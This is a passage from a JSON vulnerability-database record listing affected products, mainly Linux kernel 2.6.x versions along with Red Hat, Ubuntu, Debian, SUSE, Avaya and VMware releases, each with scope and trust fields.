        "version": "6.06"
      },
      {
        "model": "enterprise linux as 4.8.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel 2.6.27-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel -rc8-git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "enterprise mrg for red hat enterprise linux version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "v15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel 2.6.33-rc6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "enterprise linux es 4.8.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel -rc8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2010.0"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "linux enterprise server debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.0"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.1"
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.3"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.26-rc5-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel 2.6.33-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "intuity audix lx r1.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "intuity audix lx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "intuity audix lx sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "message networking",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
